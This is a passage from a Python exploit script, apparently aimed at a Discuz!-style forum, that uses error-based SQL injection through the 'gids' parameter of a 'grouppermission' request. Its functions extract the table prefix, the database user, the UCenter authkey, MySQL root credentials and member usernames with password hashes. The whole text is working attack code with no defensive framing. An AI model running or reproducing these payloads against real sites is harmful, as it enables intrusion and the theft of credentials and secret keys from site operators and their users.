para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

pre=re.findall("Duplicate entry '(.*?)'",res);

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1].decode('hex')

table_pre=table_pre[0:table_pre.index('_')]

print 'Table_pre:%s'%(table_pre)

return table_pre

def getCurrentUser(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para)

pre=re.findall("Duplicate entry '(.*?)'",res)

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1]

print 'Current User:%s'%(table_pre)

return table_pre

def getUcKey(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

res1=sendRequest(url,para1);

key1=re.findall("Duplicate entry '(.*?)'",res)

key2=re.findall("Duplicate entry '(.*?)'",res1)

if len(key1)==0:

print 'Get Uc_Key Failed!'

return ''

key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]

print 'uc_key:%s'%(key)

return key

def getRootUser(url):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}

res=sendRequest(url,para);

pre=re.findall("Duplicate entry '(.*?)'",res)

if len(pre)==0:

print 'Exploit Failed!'

exit(0);

table_pre=pre[0][:len(pre[0])-1].split(' ')

print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])

def dumpData(url,table_prefix,count):

para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}